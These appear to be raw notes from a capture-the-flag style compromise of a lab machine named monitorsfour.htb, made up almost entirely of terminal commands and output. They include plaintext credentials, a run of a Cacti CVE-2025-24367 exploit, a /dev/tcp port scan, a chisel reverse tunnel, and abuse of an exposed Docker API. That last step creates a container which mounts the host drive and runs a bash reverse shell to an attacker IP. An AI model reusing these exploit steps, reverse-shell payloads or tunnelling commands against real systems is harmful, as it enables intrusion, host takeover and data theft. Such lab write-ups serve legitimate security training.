wonderful1


www-data@821fbd6a43fa:~/app$  ip route
 ip route
default via 172.18.0.1 dev eth0 
172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.3 
www-data@821fbd6a43fa:~/app$ cat /etc/resolv.conf
cat /etc/resolv.conf
# Generated by Docker Engine.
# This file can be edited; Docker Engine will not make further changes once it
# has been modified.

nameserver 127.0.0.11
options ndots:0

# Based on host file: '/etc/resolv.conf' (internal resolver)
# ExtServers: [host(192.168.65.7)]
# Overrides: []
# Option ndots from: internal



DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r



┌──(ed㉿kali)-[/tmp/CVE-2025-24367-Cacti-PoC]
└─$ python3 exploit.py  -u marcus -p wonderful1 -i 10.10.16.7 -l 8823 -url http://cacti.monitorsfour.htb




for i in {1..65535}; do (echo > /dev/tcp/192.168.65.7/$i) >/dev/null 2>&1 && echo $i is open; done

www-data@821fbd6a43fa:/$ for i in {1..65535}; do (echo > /dev/tcp/192.168.65.7/$i) >/dev/null 2>&1 && echo $i is open; done
<8.65.7/$i) >/dev/null 2>&1 && echo $i is open; done
53 is open
2375 is open
3128 is open
5555 is open

 curl 192.168.65.7 2375



└─$ chisel server  --reverse -p 8000 
2025/12/12 20:20:57 server: Reverse tunnelling enabled
2025/12/12 20:20:57 server: Fingerprint VhdBdJnK6+cs3EzgSiDIaT3LJpMVhKhK5hSyKXggl68=
2025/12/12 20:20:57 server: Listening on http://0.0.0.0:8000
2025/12/12 20:22:11 server: session#1: Client version (1.11.3) differs from server version (1.11.3-0kali1)
2025/12/12 20:22:11 server: session#1: tun: proxy#R:2375=>192.168.65.7:2375: Listening

www-data@821fbd6a43fa:~/html$ ./chisel client 10.10.16.7:8000 R:2375:192.168.65.7:2375
<sel client 10.10.16.7:8000 R:2375:192.168.65.7:2375
2025/12/12 08:52:43 client: Connecting to ws://10.10.16.7:8000
2025/12/12 08:52:44 client: Connected (Latency 88.465899ms)


http://localhost:2375/images/json

[{"Containers":1,"Created":1762794130,"Id":"sha256:93b5d01a98de324793eae1d5960bf536402613fd5289eb041bac2c9337bc7666","Labels":{"com.docker.compose.project":"docker_setup","com.docker.compose.service":"nginx-php","com.docker.compose.version":"2.39.1"},"ParentId":"","Descriptor":{"mediaType":"application/vnd.oci.image.index.v1+json","digest":"sha256:93b5d01a98de324793eae1d5960bf536402613fd5289eb041bac2c9337bc7666","size":856},"RepoDigests":["docker_setup-nginx-php@sha256:93b5d01a98de324793eae1d5960bf536402613fd5289eb041bac2c9337bc7666"],"RepoTags":["docker_setup-nginx-php:latest"],"SharedSize":-1,"Size":1277167255},

{"Containers":1,"Created":1762791053,"Id":"sha256:74ffe0cfb45116e41fb302d0f680e014bf028ab2308ada6446931db8f55dfd40","Labels":{"com.docker.compose.project":"docker_setup","com.docker.compose.service":"mariadb","com.docker.compose.version":"2.39.1","org.opencontainers.image.authors":"MariaDB Community","org.opencontainers.image.base.name":"docker.io/library/ubuntu:noble","org.opencontainers.image.description":"MariaDB Database for relational SQL","org.opencontainers.image.documentation":"https://hub.docker.com/_/mariadb/","org.opencontainers.image.licenses":"GPL-2.0","org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.source":"https://github.com/MariaDB/mariadb-docker","org.opencontainers.image.title":"MariaDB Database","org.opencontainers.image.url":"https://github.com/MariaDB/mariadb-docker","org.opencontainers.image.vendor":"MariaDB Community","org.opencontainers.image.version":"11.4.8"},"ParentId":"","Descriptor":{"mediaType":"application/vnd.oci.image.index.v1+json","digest":"sha256:74ffe0cfb45116e41fb302d0f680e014bf028ab2308ada6446931db8f55dfd40","size":856},"RepoDigests":["docker_setup-mariadb@sha256:74ffe0cfb45116e41fb302d0f680e014bf028ab2308ada6446931db8f55dfd40"],"RepoTags":["docker_setup-mariadb:latest"],"SharedSize":-1,"Size":454269972},

{"Containers":0,"Created":1759921496,"Id":"sha256:4b7ce07002c69e8f3d704a9c5d6fd3053be500b7f1c69fc0d80990c2ad8dd412","Labels":null,"ParentId":"","Descriptor":{"mediaType":"application/vnd.oci.image.index.v1+json","digest":"sha256:4b7ce07002c69e8f3d704a9c5d6fd3053be500b7f1c69fc0d80990c2ad8dd412","size":9218},"RepoDigests":["alpine@sha256:4b7ce07002c69e8f3d704a9c5d6fd3053be500b7f1c69fc0d80990c2ad8dd412"],"RepoTags":["alpine:latest"],"SharedSize":-1,"Size":12794775}]

//create docker json file, on target host
{
  "Images": "docker_setup-nginx-php:latest",
  "Cmd" : ["/bin/bash", "-C", "bash -i >& /dev/tcp/10.10.16.7/8822 0>&1"],
  "HostConfig": {
    "Binds": ["/mnt/host/c:/host_root"]
  }
}

curl -H 'Content-Type: application/json' -d @docker.json "http://192.168.65.7:2375/containers/create" -o response.jspn


└─$ cat response.json 
{"Id":"8bb3757e56e2e22f8876b6e0f3624bc249280829980ef0af304c2fe70f3938d8","Warnings":[]}

└─$ curl -X POST "http://127.0.0.1:2375/containers/8bb3757e56e2e22f8876b6e0f3624bc249280829980ef0af304c2fe70f3938d8/start"
